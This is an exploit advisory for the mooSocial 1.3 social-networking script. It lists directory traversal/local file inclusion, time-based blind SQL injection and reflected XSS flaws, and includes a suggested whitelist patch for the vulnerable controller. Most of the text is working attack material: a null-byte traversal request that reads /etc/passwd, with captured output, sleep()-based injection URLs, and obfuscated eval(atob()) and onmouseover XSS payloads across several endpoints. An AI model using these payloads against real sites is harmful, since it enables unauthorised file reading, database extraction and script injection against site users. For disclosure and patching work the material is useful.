###########################################################################################
#Exploit Title: mooSocial 1.3 - Multiple Vulnerabilities
#Official site: http://www.moosocial.com
#Risk Level: High
#Exploit Author: Esac
#Homepage author : www.iss4m.ma
#Last Checked: 22/08/2013
###########################################################################################

+----------+
| OVERVIEW |
+----------+

mooSocial is a social networking script built on top of the CakePHP 2 framework. It has all the features needed to build a successful community (e.g. blog, photo, group, event, video, topic...).
mooSocial is sold as a premium product { Standard Version : $149  Developer Version : $449 }

+-----------------------------------------------------------------------------------+

+----------------------------+
| Directory Traversal / LFI  |
+----------------------------+

mooSocial is vulnerable to a directory traversal / local file inclusion vulnerability. As a result, an attacker can load any webserver-readable file from the local filesystem (and execute PHP already stored on the server).

+--------------------+
| How did it work?   |
+--------------------+

In the PHP code of the mooSocial website there is a controller called PagesController.php that is used to load static / semi-static pages. The exact name of the page to be loaded is determined by the query string: for example, http://www.server/pages/chat loads the site's chat page, which is stored as a template in the system.
I used the Burp Suite tool to intercept the data because there is a redirection when we put something else after the root path.

Vulnerable code :
...................
class PagesController extends AppController {

    public function display() {
        $path = func_get_args();

        $count = count($path);
        if (!$count) {
            $this->redirect('/');
        }
        $page = $subpage = $title_for_layout = null;

        if (!empty($path[0])) {
            $page = $path[0];
        }
        if (!empty($path[1])) {
            $subpage = $path[1];
        }
        if (!empty($path[$count - 1])) {
            $title_for_layout = Inflector::humanize($path[$count - 1]);
        }
        $this->set(compact('page', 'subpage', 'title_for_layout'));

        // check if site is offline
        $moo_setting = $this->_getSettings();
        $uid = $this->Session->read('uid');
        if ( !empty( $moo_setting['site_offline'] ) && !is_root_admin( $uid ) ) {
            $this->layout = '';
            $this->set('offline_message', $moo_setting['offline_message']);
            $this->render('/Elements/misc/offline');
        } else
            // sink: the user-supplied path segments reach render() without any validation
            $this->render(implode('/', $path));
    }
}

This code is vulnerable to a directory traversal attack: $path, which is used to load a template, is tied directly to user input (the arguments to the function are the elements of the query string). By sending URL slashes (/), it is possible to break out of the current directory and traverse via a relative path to any directory in the system. It is also possible to convince CakePHP (the framework used here) to load files without the .ctp file extension associated with templates by including a URL-encoded null byte (%00) at the end of the URL.
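A hardened version of the same action, added here as an example and not mooSocial's own fix: every path segment is checked against a whitelist before it can reach render(). It assumes it is dropped into the CakePHP 2 application (AppController, Inflector and NotFoundException come from the framework); isSafePagePath() is our own helper name.

```php
<?php
// Added example (not the vendor's patch): whitelist the page path before render().
// Assumes a CakePHP 2 app; isSafePagePath() is an assumed helper name.

/**
 * True only if every segment is a bare template name made of letters,
 * digits, '_' or '-'. A '..' segment, a '/', an injected null byte (the
 * %00 trick that drops the .ctp suffix) and empty segments all fail.
 */
function isSafePagePath(array $path)
{
    foreach ($path as $segment) {
        if (!is_string($segment) || !preg_match('/\A[A-Za-z0-9_-]+\z/', $segment)) {
            return false;
        }
    }
    return true;
}

class PagesController extends AppController
{
    public function display()
    {
        $path = func_get_args();

        $count = count($path);
        if (!$count) {
            return $this->redirect('/');
        }

        // Fail closed: anything that is not a plain template name is a 404.
        // The rejected value is neither echoed back nor passed to render().
        if (!isSafePagePath($path)) {
            throw new NotFoundException();
        }

        $page = $subpage = null;
        if (!empty($path[0])) {
            $page = $path[0];
        }
        if (!empty($path[1])) {
            $subpage = $path[1];
        }
        $title_for_layout = Inflector::humanize($path[$count - 1]);
        $this->set(compact('page', 'subpage', 'title_for_layout'));

        // The site_offline branch from the original action goes here unchanged;
        // the only difference is that $path is now confined to View/Pages/.
        $this->render(implode('/', $path));
    }
}
```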
+------------------+
| PROOF OF CONCEPT |
+------------------+

http://server/pages/../../../../../../../../../../etc/passwd%00

Request Headers :

GET /pages/../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: server
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Response Headers :

HTTP/1.1 404 Not Found
Date: Thu, 22 Aug 2013 04:56:29 GMT
Server: Apache
Set-Cookie: CAKEPHP=r7t684gq0po1spmqpp5634p2l3; expires=Thu, 22-Aug-2013 05:26:29 GMT; path=/
Content-Length: 37338
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

Response Raw :

//source code of the page
.........................
root:x:0:0::/ramdisk/root:/ramdisk/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
........................

+--------------------------------+
| Time-Based Blind Injection     |
+--------------------------------+

http://server/blogs/view/{Inject here}

Real exploitation :

http://server/blogs/view/1 and sleep(2)  ==> will pause for 2 seconds and then display the page
http://server/blogs/view/1 and sleep(10) ==> will pause for 10 seconds and then display the page

+-----+
| XSS |
+-----+

//all XSS tested on Mozilla Firefox
http://server/tags/view/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://server/albums/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://server/blogs/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://server/topics/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://server/groups/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'
http://server/videos/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'

//The input is reflected inside a <script> tag between single quotes
http://server/groups/view/10/video_id:'';!--'<XSS>=&{()}
http://server/groups/view/10/topic_id:'';!--'<XSS>=&{()}

XSS via POST method :

POST /videos/ajax_embed HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Cookie: CAKEPHP=u3e5q7ut90nhcg7ao1e9c8tni4; mooSocial[language]=Q2FrZQ%3D%3D.9%2F79; mooSocial[theme]=Q2FrZQ%3D%3D.%2FvHjC2hN; mooSocial[activity_feed]=Q2FrZQ%3D%3D.9%2Bb%2FFmVNBY8%3D
Host: server
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

source=youtube&source_id=" onmouseover=prompt(976681) bad="

+--------------------------------------------------------------------------------------+

Knowledge is not an Object, it's a flaw :)

Greetz : White Tarbouch TEAM - Cobra
WwW.Iss4m.Ma
./Issam IEBOUBEN Aka Esac